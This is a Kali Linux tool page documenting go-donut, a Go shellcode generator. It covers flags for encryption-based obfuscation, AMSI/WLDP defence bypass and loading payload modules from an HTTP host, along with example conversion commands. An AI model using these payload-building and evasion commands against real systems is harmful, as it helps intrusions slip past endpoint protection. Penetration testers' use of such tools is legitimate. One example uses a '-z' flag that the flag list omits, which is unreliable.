
go-donut

go-donut is a pure Go implementation of the Donut Injector that converts VBS/JS or PE/.NET EXE/DLL files into shellcode. The go-donut binary is built from the github-binject-go-donut package.

Description

The golang-github-binject-go-donut package provides the Donut Injector ported to pure Go, enabling the creation of shellcode from various executable formats. This tool is useful for generating position-independent shellcode for injection purposes in red teaming and penetration testing scenarios. The binary go-donut is the primary interface for users to perform these conversions.

Key features include support for entropy obfuscation, architecture selection, AMSI/WLDP bypass options, and output in multiple formats. It handles PE and .NET binaries as well as VBS/JS scripts, making it versatile for creating payloads that can be hosted via HTTP or embedded directly.

The package also includes a development variant with Go source code for custom builds or extensions. Installation is straightforward via Kali's package manager.

How It Works

go-donut processes input files (VBS/JS, PE EXE/DLL, .NET assemblies) and generates shellcode using Donut's techniques for position-independent execution. It applies entropy (random names, symmetric encryption), compresses payloads, supports module loading from HTTP servers, and includes AMSI/WLDP evasion. Output formats include raw shellcode, which can be injected into target processes across x86/x64 architectures.

Installation

sudo apt install golang-github-binject-go-donut

Flags

-h, --help      Print help information
-n, --module    Module name. Randomly generated by default with entropy enabled.
-u, --url       HTTP server that will host the donut module.
-e, --entropy   Entropy. 1=disable, 2=use random names, 3=random names + symmetric encryption (default). Default: 3
-a, --arch      Target Architecture: x32, x64, or x84. Default: x84
-b, --bypass    Bypass AMSI/WLDP: 1=skip, 2=abort on fail, 3=continue on fail
-o, --out       Output file
-f, --format    Output format
-i, --in        Input file (required)
-v, --verbose   Verbose output

Examples

Prints the full help information and usage details for the tool.
go-donut -h

Converts a PE EXE to x64 shellcode with default entropy (random names + encryption).
go-donut -i input.exe -o output.bin -a x64 -e 3

Converts a VBS script to shellcode hosted from an HTTP server module.
go-donut -i script.vbs -o shellcode.bin -u http://example.com/module.dll

Converts a DLL with AMSI/WLDP bypass (continue on fail) in raw shellcode format.
go-donut -i app.dll -o payload.bin -b 3 -f 1

Converts a .NET EXE to x86 shellcode with random names entropy and verbose output.
go-donut -i netapp.exe -o out.bin -a x32 -e 2 -v

Converts a JS file to compressed shellcode with custom module name.
go-donut -i jsfile.js -o shell.bin -n mymodule -z 1

Updated 2026-04-16 (kali.org)